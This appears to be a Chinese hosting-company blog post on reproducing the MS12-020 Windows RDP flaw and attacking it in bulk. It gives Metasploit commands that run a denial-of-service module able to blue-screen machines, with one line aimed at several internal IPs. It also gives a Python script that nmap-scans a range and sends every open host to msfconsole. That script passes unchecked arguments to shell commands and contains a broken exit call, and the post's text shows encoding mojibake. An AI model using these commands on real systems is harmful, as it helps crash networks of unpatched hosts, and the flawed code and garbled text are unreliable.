Windows 遠程桌面協(xié)議漏洞,可執(zhí)行代碼,POC可導(dǎo)致藍屏。(RDP遠程桌面執(zhí)行代碼漏洞)
Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost <ip>
run
此pyload僅支持單目標(biāo)。
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
#encoding:utf-8
import xml.sax
import sys
import os
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self, filterport=None):
self.CurrentData = ""
self.port=filterport
self.data = ""
self.datas=[]
# 元素開始事件處理
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "address":
self.data=attributes["addr"]
# 元素結(jié)束事件處理
def endElement(self, tag):
if self.CurrentData == "address":
self.datas.append(self.data)
self.data=""
self.CurrentData = ""
class Gather(object):
def __init__(self, filterport=None):
# 創(chuàng)建一個 XMLReader
self.parser = xml.sax.make_parser()
# turn off namepsaces
self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# 重寫 ContextHandler
self.Handler = MovieHandler(filterport)
self.parser.setContentHandler( self.Handler )
def run(self, port):
self.Handler.datas=[]
self.parser.parse(port+".xml")
print(self.Handler.datas)
def get_ans(self):
return self.Handler.datas
if __name__ == "__main__":
if len(sys.argv) !=3:
os.exit()
os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
g = Gather()
g.run(sys.argv[2])
# create cmd
cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'
ips = g.get_ans()
if len(ips)>0:
for ip in g.get_ans():
cmd += "set rhosts "+ip+";run;"
cmd += 'exit;"'
os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py <ip> <port>
# 功能:針對某種服務(wù)的漏洞對指定IP段的所有主機進行檢測,獲取可能存在問題的主機IP,并調(diào)用對應(yīng)的Msf Payload進行利用嘗試。
# ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致
# port僅支持單端口
systeminfo | find /i "KB2621440"
如果存在結(jié)果如下,證明已打補丁,否則,需要打?qū)?yīng)的補丁。
Windows Server 2003補丁
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。
文章名稱:MS12-020漏洞復(fù)現(xiàn)及自動化批量利用-創(chuàng)新互聯(lián)
瀏覽路徑:http://aaarwkj.com/article48/gidhp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供域名注冊、品牌網(wǎng)站設(shè)計、品牌網(wǎng)站建設(shè)、微信小程序、服務(wù)器托管、品牌網(wǎng)站制作
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容